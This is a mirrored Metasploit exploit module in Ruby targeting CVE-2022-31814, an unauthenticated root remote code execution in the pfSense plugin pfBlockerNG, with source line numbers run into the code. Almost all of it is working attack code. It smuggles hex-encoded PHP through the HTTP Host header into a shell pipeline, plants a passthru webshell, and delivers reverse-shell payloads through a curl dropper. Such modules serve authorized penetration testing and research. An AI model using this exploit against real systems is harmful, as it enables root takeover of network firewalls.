CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10include Msf::Exploit::FileDropper1112prepend Msf::Exploit::Remote::AutoCheck1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',19'Description' => %q{20pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to21block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected22by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.23},24'Author' => [25'IHTeam', # discovery26'jheysel-r7' # module27],28'References' => [29[ 'CVE', '2022-31814' ],30[ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/'],31[ 'EDB', '51032' ]32],33'License' => MSF_LICENSE,34'Platform' => 'unix',35'Privileged' => false,36'Arch' => [ ARCH_CMD ],37'Targets' => [38[39'Unix Command',40{41'Platform' => 'unix',42'Arch' => ARCH_CMD,43'Type' => :unix_cmd,44'DefaultOptions' => {45'PAYLOAD' => 'cmd/unix/reverse_openssl'46}47}48],49[50'BSD Dropper',51{52'Platform' => 'bsd',53'Arch' => [ARCH_X64],54'Type' => :bsd_dropper,55'CmdStagerFlavor' => [ 'curl' ],56'DefaultOptions' => {57'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'58}59}60]61],62'DefaultTarget' => 1,63'DisclosureDate' => '2022-09-05',64'DefaultOptions' => {65'SSL' => true,66'RPORT' => 44367},68'Notes' => {69'Stability' => [ CRASH_SERVICE_DOWN ],70'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],71'Reliability' => [ REPEATABLE_SESSION, ]72}73)74)7576register_options(77[78OptString.new('WEBSHELL_NAME', [79false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil80])81]82)83end8485def upload_shell86print_status 'Uploading shell...'87if datastore['WEBSHELL_NAME'].blank?88@webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"89else90@webshell_name = "#{datastore['WEBSHELL_NAME']}.php"91end92@parameter_name = Rex::Text.rand_text_alpha(4..12)93print_status("Webshell name is: #{@webshell_name}")94web_shell_contents = <<~EOF95<?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');96EOF97encoded_php = web_shell_contents.unpack('H*')[0].upcase98send_request_raw(99'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),100'headers' => {101'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"102}103)104sleep datastore['WfsDelay']105register_file_for_cleanup("/usr/local/www/#{@webshell_name}")106end107108def check109test_file_name = Rex::Text.rand_text_alpha(4..12)110test_file_content = Rex::Text.rand_text_alpha(4..12)111test_injection = <<~EOF112<?php echo file_put_contents('/usr/local/www/#{test_file_name}','#{test_file_content}');113EOF114encoded_php = test_injection.unpack('H*')[0].upcase115send_request_raw(116'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),117'headers' => {118'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"119}120)121sleep datastore['WfsDelay']122123check_resp = send_request_cgi(124'method' => 'GET',125'uri' => normalize_uri(target_uri.path, "/#{test_file_name}")126)127return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || !check_resp.code == 200 || !check_resp.body.include?(test_file_content)128129# Clean up test webshell "/usr/local/www/#{test_file_name}"130clean_up_injection = <<~EOF131<?php echo unlink('/usr/local/www/#{test_file_name}');132EOF133encoded_clean_up = clean_up_injection.unpack('H*')[0].upcase134send_request_raw(135'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),136'headers' => {137'Host' => "' *; echo '16i #{encoded_clean_up} P' | dc | php; '"138}139)140Exploit::CheckCode::Vulnerable141end142143def execute_command(cmd, _opts = {})144send_request_cgi({145'method' => 'POST',146'uri' => normalize_uri(target_uri.path, @webshell_name),147'headers' => {148'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'149},150'vars_post' => {151@parameter_name.to_s => cmd152}153})154end155156def exploit157upload_shell158print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")159case target['Type']160when :unix_cmd161execute_command(payload.encoded)162when :bsd_dropper163execute_cmdstager164end165end166end167168169